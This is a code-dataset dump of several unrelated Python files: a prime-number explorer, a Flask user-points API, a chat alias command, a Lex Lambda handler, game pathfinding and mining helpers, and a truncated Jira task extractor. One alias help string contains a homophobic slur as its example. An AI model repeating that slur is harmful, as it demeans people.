\r\ndef factorization(n):\r\n factors = []\r\n for i in range(2, int(math.sqrt(n)+1)):\r\n if n % i == 0:\r\n if i in prime(n):\r\n factors.append(i)\r\n if(len(factors)==0):\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This composite number has the following prime factors\")\r\n print(factors)\r\n\r\n#Tests the primality of an integer using the Sieve of Eratosthenes\r\ndef primalitysieve(n):\r\n primes = prime(n)\r\n if n in primes:\r\n print(\"This number is a prime\")\r\n else:\r\n print(\"This number is a composite\")\r\n \r\n \r\ndef distribution(n):\r\n end1 = 0\r\n end3 = 0 \r\n end5 = 0\r\n end7 = 0\r\n end9 = 0\r\n end1to1 = 0\r\n end1to3 = 0\r\n end1to5 = 0\r\n end1to7 = 0\r\n end1to9 = 0\r\n end3to1 = 0\r\n end3to3 = 0\r\n end3to5 = 0\r\n end3to7 = 0\r\n end3to9 = 0\r\n end5to1 = 0\r\n end5to3 = 0\r\n end5to5 = 0\r\n end5to7 = 0\r\n end5to9 = 0\r\n end7to1 = 0\r\n end7to3 = 0\r\n end7to5 = 0\r\n end7to7 = 0\r\n end7to9 = 0\r\n end9to1 = 0\r\n end9to3 = 0\r\n end9to5 = 0\r\n end9to7 = 0\r\n end9to9 = 0\r\n twinprime = 0\r\n twinprimelist = []\r\n primeaxis = []\r\n rangeaxis = []\r\n count = 1\r\n \r\n primes = prime(n)\r\n primes = prime(n)\r\n \r\n #This part of the program analyzes the distribution of primes\r\n for i in range(len(primes)):\r\n primename = str(primes[i])\r\n if primename[-1] == '1':\r\n end1+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end1to1+=1\r\n if nextprimename[-1] == '3':\r\n end1to3+=1\r\n if nextprimename[-1] == '5':\r\n end1to5+=1\r\n if nextprimename[-1] == '7':\r\n end1to7+=1\r\n if nextprimename[-1] == '9':\r\n end1to9+=1\r\n if primename[-1] == '3':\r\n end3+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end3to1+=1\r\n if nextprimename[-1] == '3':\r\n end3to3+=1\r\n if nextprimename[-1] == '5':\r\n end3to5+=1\r\n if nextprimename[-1] == '7':\r\n end3to7+=1\r\n if nextprimename[-1] == '9':\r\n end3to9+=1\r\n if primename[-1] == '5':\r\n end5+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end5to1+=1\r\n if nextprimename[-1] == '3':\r\n end5to3+=1\r\n if nextprimename[-1] == '5':\r\n end5to5+=1\r\n if nextprimename[-1] == '7':\r\n end5to7+=1\r\n if nextprimename[-1] == '9':\r\n end5to9+=1\r\n \r\n if primename[-1] == '7':\r\n end7+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end7to1+=1\r\n if nextprimename[-1] == '3':\r\n end7to3+=1\r\n if nextprimename[-1] == '5':\r\n end7to5+=1\r\n if nextprimename[-1] == '7':\r\n end7to7+=1\r\n if nextprimename[-1] == '9':\r\n end7to9+=1\r\n \r\n \r\n \r\n \r\n if primename[-1] == '9':\r\n end9+=1\r\n if i+1 < len(primes):\r\n nextprimename = str(primes[i+1])\r\n if nextprimename[-1] == '1':\r\n end9to1+=1\r\n if nextprimename[-1] == '3':\r\n end9to3+=1\r\n if nextprimename[-1] == '5':\r\n end9to5+=1\r\n if nextprimename[-1] == '7':\r\n end9to7+=1\r\n if nextprimename[-1] == '9':\r\n end9to9+=1\r\n \r\n #This portion of the method calculates the twin primes in a given range.\r\n if primes[i] != 2:\r\n if i+1 < len(primes):\r\n \r\n if primes[i+1] == primes[i]+2:\r\n twinprime+=1\r\n pair = []\r\n pair.append(primes[i])\r\n pair.append(primes[i+1])\r\n twinprimelist.append(pair)\r\n \r\n print(\"Within this range there are \" + str(twinprime) + \" pairs of twin primes\")\r\n print(\"These are the twin primes: \" + str(twinprimelist))\r\n # This part of the function generates graph showing how it scales\r\n while(count <= 100000):\r\n rangeaxis.append(count)\r\n primecount = prime(count)\r\n primeaxis.append(len(primecount))\r\n count= count+100\r\n plt.scatter(rangeaxis,primeaxis)\r\n plt.xlabel(\"Range\")\r\n plt.ylabel(\"Amount of Prime\")\r\n plt.title(\"The Amount of Prime vs Range\")\r\n plt.show()\r\n \r\n print(\"end1\" + \" \" + str(end1/len(primes)))\r\n print(\"end1to1\" + \" \" + str(end1to1/len(primes)))\r\n print(\"end1to3\" + \" \" +str(end1to3/len(primes)))\r\n print(\"end1to5\" + \" \" + str(end1to5/len(primes)))\r\n print(\"end1to7\" + \" \" + str(end1to7/len(primes)))\r\n print(\"end1to9\" + \" \" + str(end1to9/len(primes)))\r\n \r\n print(\"end3\" + \" \" + str(end3/len(primes)))\r\n print(\"end3to1\" + \" \" + str(end3to1/len(primes)))\r\n print(\"end3to3\" + \" \" +str(end3to3/len(primes)))\r\n print(\"end3to5\" + \" \" + str(end3to5/len(primes)))\r\n print(\"end3to7\" + \" \" + str(end3to7/len(primes)))\r\n print(\"end3to9\" + \" \" + str(end3to9/len(primes)))\r\n \r\n print(\"end5\" + \" \" + str(end5/len(primes)))\r\n print(\"end5to1\" + \" \" + str(end5to1/len(primes)))\r\n print(\"end5to3\" + \" \" +str(end5to3/len(primes)))\r\n print(\"end5to5\" + \" \" + str(end5to5/len(primes)))\r\n print(\"end5to7\" + \" \" + str(end5to7/len(primes)))\r\n print(\"end5to9\" + \" \" + str(end5to9/len(primes)))\r\n \r\n print(\"end7\" + \" \" + str(end7/len(primes)))\r\n print(\"end7to1\" + \" \" + str(end7to1/len(primes)))\r\n print(\"end7to3\" + \" \" +str(end7to3/len(primes)))\r\n print(\"end7to5\" + \" \" + str(end7to5/len(primes)))\r\n print(\"end7to7\" + \" \" + str(end7to7/len(primes)))\r\n print(\"end7to9\" + \" \" + str(end7to9/len(primes)))\r\n \r\n print(\"end9\" + \" \" + str(end9/len(primes)))\r\n print(\"end9to1\" + \" \" + str(end9to1/len(primes)))\r\n print(\"end9to3\" + \" \" + str(end9to3/len(primes)))\r\n print(\"end9to5\" + \" \" + str(end9to5/len(primes)))\r\n print(\"end9to7\" + \" \" + str(end9to7/len(primes)))\r\n print(\"end9to9\" + \" \" + str(end9to9/len(primes)))\r\n \r\n # This method is used to draw the squares for the visualization \r\ndef draw_square(n):\r\n t.left(n % 360)\r\n \r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n t.forward(n)\r\n t.left(90)\r\n \r\n primename = str(n)\r\n t.colormode(255)\r\n t.bgcolor(0,0,0)\r\n if primename[-1] == '1':\r\n t.pencolor(233,150,122)\r\n if primename[-1] == '2':\r\n t.pencolor(240,255,255)\r\n if primename[-1] == '3':\r\n t.pencolor(139,0 ,139)\r\n if primename[-1] == '5':\r\n t.pencolor(0,255,255)\r\n if primename[-1] == '7':\r\n t.pencolor(220,20,60)\r\n if primename[-1] == '9':\r\n t.pencolor(145,44,238)\r\n\r\n\r\ndef visualizer(n):\r\n t.clear()\r\n t.reset()\r\n primes = prime(n)\r\n for i in range(n):\r\n draw_square(primes[i])\r\n\r\n\r\ndef menu():\r\n print(\"The Prime Project: \")\r\n print(\"1.Find the Greatest Common Denominator\")\r\n print(\"2. Generate Prime Numbers\")\r\n print(\"3. Primality Test Using Trial Division\") \r\n print(\"4. Primality Test Using Sieve of Eratosthenes.\")\r\n print(\"5. Prime Factorization\")\r\n print(\"6. Prime Distribution and Twin Primes\")\r\n print(\"7. Prime Visualization\")\r\n \r\n \r\n choice = input(\"What would you like to do?\")\r\n if choice == '1':\r\n integer1 = int(input(\"Enter the an integer: \"))\r\n integer2 = int(input(\"Enter another integer: \"))\r\n print(GCD(integer1, integer2))\r\n menu()\r\n if choice == '2':\r\n integer1 = int(input(\"Enter the range you want: \"))\r\n print(prime(integer1))\r\n print(\"There are \" + str(len(prime(integer1))) + \" prime numbers in this range.\")\r\n menu()\r\n if choice == '3':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n trialdivision(integer1)\r\n menu()\r\n if choice == '4':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n primalitysieve(integer1)\r\n menu()\r\n if choice == '5':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n factorization(integer1)\r\n menu()\r\n if choice == '6':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n distribution(integer1)\r\n menu()\r\n \r\n if choice == '7':\r\n integer1 = int(input(\"Enter an integer: \"))\r\n visualizer(integer1)\r\n menu()\r\n\r\nprint(\"Welcome to the Prime Project.\")\r\nprint(\"This program allows us to explore the beauty of prime numbers.\")\r\nprint(\"Just enter the number associated with a choice on the number so use the program.\")\r\nprint(\"And keep in mind that the visualization opens up a new window\")\r\nprint(\"Thanks for using my program!\")\r\nmenu()\r\n\r\n","sub_path":"Prime_Project.py","file_name":"Prime_Project.py","file_ext":"py","file_size_in_byte":11186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"614483895","text":"from flask import Flask, request, jsonify, render_template, redirect, url_for\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom os import environ\r\nimport requests\r\nfrom datetime import datetime\r\nfrom flask_cors import CORS\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n# SQL settings\r\napp.config['SQLALCHEMY_DATABASE_URI'] = environ.get('dbURL') or 'mysql+mysqlconnector://root@localhost:3306/user'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\napp.config['SQLALCHEMY_ENGINE_OPTIONS'] = {'pool_recycle': 299}\r\n\r\ndb = SQLAlchemy(app)\r\nCORS(app)\r\n\r\nclass users(db.Model):\r\n __tablename__ = 'users'\r\n id = db.Column(db.Integer, primary_key=True)\r\n username = db.Column(db.String(300), unique=True)\r\n is_member = db.Column(db.String(1), nullable=False)\r\n membership_date = db.Column(db.Date)\r\n current_points = db.Column(db.Integer)\r\n total_points = db.Column(db.Integer)\r\n boxes_open = db.Column(db.Integer)\r\n last_login = db.Column(db.Date)\r\n daily_boxes = db.Column(db.Integer)\r\n\r\n def json(self):\r\n return {\r\n \"username\":self.username,\r\n \"is_member\":self.is_member,\r\n \"membership_date\":self.membership_date,\r\n \"current_points\":self.current_points,\r\n \"total_points\":self.total_points,\r\n \"boxes_open\":self.boxes_open,\r\n \"last_login\":self.last_login,\r\n \"daily_boxes\":self.daily_boxes\r\n }\r\n \r\n def lbpjson(self):\r\n return {\r\n \"username\":self.username,\r\n \"total_points\":self.total_points\r\n }\r\n \r\n def lbbjson(self):\r\n return {\r\n \"username\":self.username,\r\n \"boxes_open\":self.boxes_open\r\n }\r\n\r\n def cbjson(self):\r\n return{\r\n \"username\":self.username,\r\n \"current_points\":self.current_points\r\n }\r\n \r\n def memjson(self):\r\n return {\r\n \"username\": self.username,\r\n \"is_member\": self.is_member\r\n }\r\n\r\n def boxjson(self):\r\n return {\r\n \"username\": self.username,\r\n \"daily_boxes\": self.daily_boxes\r\n }\r\n\r\n\r\nclass user_inventory(db.Model):\r\n __tablename__ = 'user_inventory'\r\n username = db.Column(db.String(300), primary_key=True)\r\n itemname = db.Column(db.String(100), primary_key=True)\r\n quantity = db.Column(db.Integer,nullable=False)\r\n\r\n def __init__(self,username,itemname,quantity):\r\n self.username=username\r\n self.itemname=itemname\r\n self.quantity=quantity\r\n\r\n def json(self):\r\n return{\r\n \"itemname\":self.itemname,\r\n \"quantity\":self.quantity\r\n }\r\n\r\n@app.route('/user/boxcount/')\r\ndef boxCount(username):\r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n return jsonify({\r\n \"code\":200,\r\n \"data\": user.boxjson()\r\n }),200\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": \"User is not found\"\r\n }),404\r\n\r\n\r\n@app.route('/user/useBox',methods=['PUT'])\r\ndef useBox():\r\n # JSON PASSED - {username}\r\n data = request.get_json()\r\n username = data['username']\r\n\r\n user = users.query.filter_by(username=username).first()\r\n\r\n if user:\r\n if user.daily_boxes == 0:\r\n return jsonify({\r\n \"code\":500,\r\n \"message\": \"You have zero boxes.\"\r\n })\r\n else:\r\n user.daily_boxes -= 1\r\n db.session.commit()\r\n return jsonify({\r\n \"code\":200,\r\n \"message\": \"Deduction of box is successful\"\r\n })\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": 'User not found.'\r\n })\r\n\r\n\r\n@app.route('/user/lastlogin',methods=['PUT'])\r\ndef updateLastLogin():\r\n # JSON PASSED - {username}\r\n data = request.get_json()\r\n username = data['username']\r\n \r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n login_date = datetime.today().strftime('%Y-%m-%d')\r\n is_member = False\r\n if user.is_member == \"Y\":\r\n is_member = True\r\n user_last_login = user.last_login\r\n if str(user_last_login) == str(login_date):\r\n return jsonify({\r\n \"code\": 200,\r\n \"message\": \"User logged in today already.\"\r\n })\r\n else:\r\n user.last_login = login_date\r\n if is_member:\r\n user.daily_boxes = 5\r\n else:\r\n user.daily_boxes = 3\r\n db.session.commit()\r\n\r\n return jsonify({\r\n \"code\": 200,\r\n \"message\": \"Welcome back, you have received \" + str(user.daily_boxes) +\" boxes. Happy planting!\",\r\n })\r\n\r\n\r\n\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": 'User not found.'\r\n })\r\n\r\n\r\n\r\n\r\n@app.route('/user/checkmember/')\r\ndef check_member(username):\r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n return jsonify({\r\n \"code\": 200,\r\n \"user\": user.memjson()\r\n }),200\r\n else:\r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": 'User not found.'\r\n })\r\n\r\n\r\n@app.route(\"/user/\")\r\ndef get_user(username):\r\n user = users.query.filter_by(username=username).first()\r\n if user:\r\n return jsonify({\r\n \"code\": 200,\r\n \"user\": user.json()\r\n }),200\r\n else:\r\n return jsonify({\r\n \"code\":404,\r\n \"user\": \"Not found.\"\r\n }),404\r\n\r\n@app.route(\"/user/getInventory/\")\r\ndef get_inventory(username):\r\n inventory_list = []\r\n inventory_list = user_inventory.query.filter_by(username=username)\r\n if inventory_list == [] or inventory_list == None:\r\n return jsonify({\r\n \"code\":200,\r\n \"inventory\": \"You have no items in your inventory.\"\r\n }), 200\r\n else:\r\n item_list = []\r\n for inventory in inventory_list:\r\n item_list.append(inventory.json())\r\n \r\n return jsonify({\r\n \"code\": 200,\r\n \"inventory\": item_list\r\n }), 200\r\n\r\n\r\n\r\n\r\n@app.route(\"/user/leaderboardRank\")\r\ndef leaderboard():\r\n # get top 10 for both point and box open\r\n lbpoint = users.query.order_by(users.total_points.desc()).limit(10).all()\r\n lbbox = users.query.order_by(users.boxes_open.desc()).limit(10).all()\r\n\r\n # check in there is record in both of the lb\r\n if lbbox and lbpoint:\r\n # print(lbbox)\r\n # print(lbpoint)\r\n #return result\r\n lbpoint_array = []\r\n lbbox_array = []\r\n for user in lbpoint:\r\n lbpoint_array.append(user.lbpjson())\r\n for user2 in lbbox:\r\n lbbox_array.append(user2.lbbjson())\r\n\r\n return jsonify(\r\n {\r\n \"code\": 200,\r\n \"top10_points\": lbpoint_array,\r\n \"top10_boxes\": lbbox_array\r\n }\r\n )\r\n #return error for no record found\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"message\": \"there are no records found\"\r\n }\r\n ), 404\r\n\r\n@app.route(\"/user/balance/\")\r\ndef checkbalance(username):\r\n #get the user record\r\n checkb = users.query.filter_by(username=username).first()\r\n #check if user record is found\r\n if checkb:\r\n # if record found return the balance\r\n return jsonify(\r\n {\r\n \"code\": 200,\r\n \"data\": checkb.cbjson()\r\n }\r\n )\r\n #return error for no such user\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"message\": \"There is no such user existing\"\r\n }\r\n ), 404\r\n\r\n@app.route(\"/user/membership/\", methods=['PUT'])\r\ndef updatemembership(username):\r\n # Data to be passed through should be {username, membership-date}\r\n #get the user record\r\n usermembership = users.query.filter_by(username=username).first()\r\n # check if the user is in our record\r\n if usermembership:\r\n data = {\r\n \"username\": request.json.get('username'),\r\n \"membership-date\": request.json.get('membership-date')\r\n }\r\n #double check if the requested username sync with our database username again\r\n if data['username'] == usermembership.username:\r\n #check if user is existing member or not\r\n if usermembership.is_member != \"Y\":\r\n #update the membership record\r\n usermembership.is_member = \"Y\"\r\n usermembership.membership_date = data['membership-date']\r\n db.session.commit()\r\n return jsonify(\r\n {\r\n \"code\": 200,\r\n \"data\": usermembership.json(),\r\n \"message\": \"Membership has been successfully applied\"\r\n }\r\n ),200\r\n #return error for existing membership\r\n return jsonify(\r\n {\r\n \"code\": 500,\r\n \"data\": usermembership.json(),\r\n \"message\": \"user is a existing subscribed member\"\r\n }\r\n ),500\r\n \r\n return jsonify(\r\n {\r\n \"code\": 403,\r\n \"message\": \"Usernames do NOT match!\"\r\n }\r\n ),403\r\n\r\n #return error for user not found\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"data\": {\r\n \"username\": username\r\n },\r\n \"message\": \"username not found\"\r\n }\r\n ), 404\r\n\r\n@app.route(\"/user/openbox/\", methods=['PUT'])\r\ndef openbox(username):\r\n # JSON PASSED THROUGH { box_contents, box_latitude, box_longitude, boxid, is_opened, no_of_points, planted_by_username }\r\n #get record for user\r\n points = users.query.filter_by(username=username).first()\r\n\r\n #check if there is such user is in our user database\r\n if points:\r\n #check if user is a member\r\n is_member = False\r\n if points.is_member == \"Y\":\r\n is_member = True\r\n\r\n #get box stuff from content \r\n data = request.get_json()\r\n itemname = data['box_contents']\r\n #get record of the user inventory\r\n content = \"\"\r\n if itemname != None:\r\n content = user_inventory.query.filter_by(username=username, itemname=itemname).first()\r\n #check if existing record of both primary keys username and itemid\r\n if content:\r\n #double check it sync with db again\r\n if itemname == content.itemname:\r\n #update quantity\r\n content.quantity += 1\r\n elif content != \"\" and itemname != None:\r\n #print(\"hello\")\r\n #if no record found need to create one\r\n createcontent = user_inventory(username, itemname, 1)\r\n print(createcontent)\r\n try:\r\n db.session.add(createcontent)\r\n db.session.commit()\r\n except Exception as e:\r\n # return error when fail to insert\r\n return jsonify(\r\n {\r\n \"code\":500,\r\n \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n }\r\n ), 500\r\n #update user point in user db\r\n #check if requested user is sync with db user\r\n #update points of the user\r\n if is_member:\r\n data['no_of_points'] *= 2\r\n points.total_points += data['no_of_points']\r\n points.current_points += data['no_of_points']\r\n #update user number of boxes open\r\n points.boxes_open += 1\r\n db.session.commit()\r\n\r\n #return success for both content and points updated\r\n return jsonify(\r\n {\r\n \"code\":200,\r\n \"data\":{\r\n \"item_won\": itemname,\r\n \"points_earned\": data['no_of_points']\r\n }\r\n }\r\n ),201\r\n #return error when username not found\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"data\": {\r\n \"username\": username\r\n },\r\n \"message\": \"user not found\"\r\n }\r\n ),404\r\n\r\n\r\n@app.route(\"/user/purchase/\", methods=['PUT'])\r\ndef purchase(username):\r\n # DATA PASSED THROUGH { data: [ {itemname,price,quantity}, {itemname,price,quantity}, ...] }\r\n data = request.get_json()\r\n #get record for user\r\n user = users.query.filter_by(username=username).first()\r\n\r\n #check if there is such user is in our user database\r\n if user:\r\n # Check if user is a member\r\n is_member = False\r\n if user.is_member == \"Y\":\r\n is_member = True\r\n\r\n user_balance = user.current_points\r\n cart = data['data']\r\n if cart != []:\r\n subtotal = 0\r\n for item_dict in cart:\r\n if is_member:\r\n item_dict['price'] *= 0.80\r\n subtotal += item_dict['price'] * int(item_dict['quantity'])\r\n #print(subtotal)\r\n #print(user_balance)\r\n # If user has enough points\r\n if user_balance >= subtotal:\r\n # Updating user's balance\r\n try:\r\n user.current_points -= subtotal\r\n db.session.commit()\r\n except Exception as e:\r\n return jsonify({\r\n \"code\": 500,\r\n \"message\": \"An error occurred when trying to update user balance: \" + str(e)\r\n }),500\r\n\r\n # Update user's inventory\r\n item_list = []\r\n for item_dict in cart:\r\n item_list.append(item_dict['itemname'] + \"(\" + str(item_dict['quantity']) + \")\")\r\n content = user_inventory.query.filter_by(username=username,itemname=item_dict['itemname']).first()\r\n if content == None:\r\n createcontent = user_inventory(username, item_dict['itemname'], int(item_dict['quantity']))\r\n try:\r\n db.session.add(createcontent)\r\n db.session.commit()\r\n del createcontent\r\n except Exception as e:\r\n # return error when fail to insert\r\n return jsonify(\r\n {\r\n \"code\":500,\r\n \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n }\r\n ), 500\r\n else:\r\n content.quantity += int(item_dict['quantity'])\r\n try:\r\n db.session.commit()\r\n except Exception as e:\r\n # return error when fail to insert\r\n return jsonify(\r\n {\r\n \"code\":500,\r\n \"message\": \"an error occurred updating user inventory: \" + str(e)\r\n }\r\n ), 500\r\n item_string = \",\".join(item_list)\r\n return jsonify({\r\n \"code\":200,\r\n \"message\": \"Purchase is successful. Your items have been added to your inventory.\",\r\n \"currencyUsed\": subtotal,\r\n \"items_received\": item_string\r\n }),200\r\n\r\n\r\n return jsonify({\r\n \"code\": 500,\r\n \"message\": \"You do not have enough points to purchase everything in your cart!\"\r\n })\r\n \r\n return jsonify({\r\n \"code\": 404,\r\n \"message\": \"Your cart is empty, Please select at least 1 item before you checkout.\"\r\n }),404\r\n #return error when username not found\r\n return jsonify(\r\n {\r\n \"code\": 404,\r\n \"data\": {\r\n \"username\": username\r\n },\r\n \"message\": \"user not found\"\r\n }\r\n ),404\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\",port=5004, debug=True)\r\n","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":16481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"554865320","text":"# -*- coding: utf-8 -*-\n# from twisted.words.xish import domish\n\nfrom base import *\nimport random\n\nimport bnw.core.bnw_objects as objs\n\nALIAS_RE = '[a-zA-Z0-9_-]+'\n\n\n@require_auth\n@check_arg(set=ALIAS_RE, delete=ALIAS_RE)\n@defer.inlineCallbacks\ndef cmd_alias(request, set=\"\", delete=\"\", value=\"\"):\n \"\"\" Список алиасов \"\"\"\n if not (delete or (set and value)):\n defer.returnValue(\n dict(\n ok=False, desc='Usage: alias -s \\n\\t\\tor alias -d \\nFor example, \"alias -s fag pm -u %1 YOU ARE A FAG!\" will make it easy to tell someone that he is a fag. Just \"fag \"!')\n )\n\n if set:\n assert len(set) <= 32 and len(value) <= 1024\n _ = yield objs.User.mupdate({'name': request.user['name']}, {'$set': {'aliases.%s' % (set,): value}})\n defer.returnValue(\n dict(ok=True,\n desc='Alias %s updated.' % (set,)\n )\n )\n elif delete:\n assert len(delete) <= 32\n _ = yield objs.User.mupdate({'name': request.user['name']}, {'$unset': {'aliases.%s' % (delete,): 1}})\n defer.returnValue(\n dict(ok=True,\n desc='Alias %s deleted.' % (delete,)\n )\n )\n","sub_path":"bnw/handlers/command_alias.py","file_name":"command_alias.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"99904654","text":"import json\nimport boto3\n\ndef lambda_handler(event, context):\n \n client = boto3.client('lex-runtime')\n\n response = client.post_text(\n botName=\"DiningConcierge\",\n botAlias=\"$LATEST\",\n userId=\"frontend\",\n inputText= event[\"userQuery\"]\n )\n \n return {\n 'statusCode': 200,\n 'body': response[\"message\"]\n }\n","sub_path":"LF0.py","file_name":"LF0.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"228677674","text":"#Functions to help playing the game.\nimport hashlib\nimport requests\nimport json\nimport time\nfrom datetime import datetime\nimport random\nfrom util import Stack,Queue\n\ndef path_to_current_room(oldroom,newroom,room_dict):\n paths = []\n visited = set()\n bft_queue = Queue()\n direction_queue = Queue()\n direction_queue.enqueue([None])\n bft_queue.enqueue([oldroom])\n while bft_queue.size() > 0:\n vertex_path = bft_queue.dequeue()\n direction_path = direction_queue.dequeue()\n vertex = vertex_path[-1]\n if vertex not in visited:\n visited.add(vertex)\n if vertex == newroom:\n return vertex_path,direction_path\n if vertex in room_dict.keys():\n for direction in room_dict[vertex]['exits']:\n path_copy = vertex_path.copy()\n direction_copy = direction_path.copy()\n room_no = room_dict[vertex][direction]\n path_copy.append(room_no)\n direction_copy.append(direction)\n direction_queue.enqueue(direction_copy)\n bft_queue.enqueue(path_copy)\n\ndef move_known_room(direction,room_no,cooldown,headers,visit_url):\n time.sleep(cooldown+0.1)\n data_direction = {}\n data_direction['direction'] = direction\n data_direction['next_room_id'] = str(room_no)\n data = json.dumps(data_direction)\n r = requests.post(visit_url,data=data, headers=headers)\n room_details = json.loads(r.text)\n print(f'moved {direction} to room {room_details[\"room_id\"]}')\n \n return room_details,room_details['cooldown']\n\ndef get_dash_results(moving_list):\n result_list = []\n current = moving_list[0]\n count = 0\n for value in moving_list:\n if value == current:\n count += 1\n else:\n result_list.append((current, count))\n current = value\n count = 1\n result_list.append((current, count))\n return result_list\n\ndef move_dash_rooms(direction,no_rooms,rooms_list,cooldown,headers,visit_url):\n time.sleep(cooldown+0.1)\n rs = str(rooms_list).replace('[','').replace(']','').replace(' ','')\n data_direction = {\"direction\":direction, \"num_rooms\":str(no_rooms), \"next_room_ids\":rs}\n data = json.dumps(data_direction)\n #print(f'dash data:{data}')\n r = requests.post(visit_url,data=data, headers=headers)\n room_details = json.loads(r.text)\n print(f'dash moved {direction} to room {room_details[\"room_id\"]}')\n \n \n return room_details,room_details['cooldown'] \n \n\n\ndef dash_current_room(rooms,directions,cooldown,headers,list_urls,room_dict):\n dash_results = get_dash_results(directions)\n print(f'dash_results:{dash_results}')\n i=0\n for result in dash_results:\n direction, number = result\n if number == 1:\n room_no,cooldown = move_known_room(direction,rooms[i],cooldown,headers,list_urls[0])\n room_dict[room_no['room_id']].update(room_no)\n #print('normal move',room_dict[room_no['room_id']])\n i += 1\n else:\n room_no,cooldown = move_dash_rooms(direction,number,rooms[i:i+number],cooldown,headers,list_urls[1])\n room_dict[room_no['room_id']].update(room_no)\n #print('dash move',room_dict[room_no['room_id']])\n i += number\n return room_no, cooldown,room_dict\n\ndef visit_current_room(rooms,directions,cooldown,headers,visit_url,room_dict):\n for i in range(len(directions)):\n room_no, cooldown= move_known_room(directions[i],rooms[i],cooldown,headers,visit_url)\n room_dict[room_no['room_id']].update(room_no)\n print(f'In room:{room_no}')\n return room_no, cooldown,room_dict\n\n\ndef visit_using_dash(oldroom,newroom,room_dict,cooldown,headers,list_urls):\n room_path,direction_path = path_to_current_room(oldroom,newroom,room_dict)\n room_path.pop(0)\n direction_path.pop(0)\n # print(len(direction_path))\n # print(room_path)\n # print(direction_path)\n response,cooldown,room_dict = dash_current_room(room_path,direction_path,cooldown,headers,list_urls,room_dict)\n return response,cooldown,room_dict\n\n\ndef visit_using_normal(oldroom,newroom,room_dict,cooldown,headers,visit_url):\n room_path,direction_path = path_to_current_room(oldroom,newroom,room_dict)\n room_path.pop(0)\n direction_path.pop(0)\n response,cooldown,room_dict = visit_current_room(room_path,direction_path,cooldown,headers,visit_url,room_dict)\n return response,cooldown,room_dict\n\n\n\ndef get_new_proof(block,difficulty):\n \"\"\"\n Simple Proof of Work Algorithm\n Stringify the block and look for a proof.\n Loop through possibilities, checking each one against `valid_proof`\n in an effort to find a number that is a valid proof\n :return: A valid proof for the provided block\n \"\"\"\n proof = random.randint(1,100)\n json_block = json.dumps(block,sort_keys=True)\n pattern = None\n for i in range(difficulty):\n if i == 0:\n pattern = '0'\n else:\n pattern += '0'\n print(pattern)\n while valid_proof(json_block,proof,difficulty,pattern) is False:\n proof +=1\n return proof\n\n\ndef valid_proof(block_string, proof,difficulty,pattern):\n \"\"\"\n Validates the Proof: Does hash(block_string, proof) contain 6\n leading zeroes? Return true if the proof is valid\n :param block_string: The stringified block to use to\n check in combination with `proof`\n :param proof: The value that when combined with the\n stringified previous block results in a hash that has the\n correct number of leading zeroes.\n :return: True if the resulting hash is a valid proof, False otherwise\n \"\"\"\n block_string_proof = f'{block_string}{proof}'.encode()\n hash_block = hashlib.sha256(block_string_proof).hexdigest()\n #print(\"hasbloc\",hash_block)\n\n\n if hash_block[:difficulty]==pattern:\n print(\"hasbloc\",hash_block)\n return True\n else:\n return False\n\n","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":6028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"61343350","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import print_function\nfrom .loader import load\nimport re\nfrom .task_extractor_exceptions import TaskExtractorTemplateErrorProject, TaskExtractorJiraValidationError\nfrom jira import JIRAError\n\n\nclass TaskExtractor:\n\n def __init__(self,\n jira,\n options={},\n dry_run=False):\n self.rt_vars = {} # run-time variables (issueIDs)\n self.links = [] # to keep link info\n\n self.default_params = options\n self.dry_run = dry_run\n\n self.jira = jira\n\n# ###################################################################################\n# helpers for validate_load()\n\n def _validate_url_and_type(self, url):\n match = re.search(\"^https?://\", url)\n return url if match else \"http://\" + url\n\n# end of load() helpers\n# ###################################################################################\n\n def validate_load(self, task_list):\n \"\"\"\n Take the task_list prepared by load() and validate assignees and projects\n \"\"\"\n assignees = []\n\n for line in task_list:\n if 'assignee' in line:\n if line['assignee'] not in assignees:\n assignees.append(line['assignee'])\n self._validate_user(\n line['assignee'],\n self._get_project_or_raise_exception(line))\n\n\n# ###################################################################################\n# helpers for validate_load()\n\n def 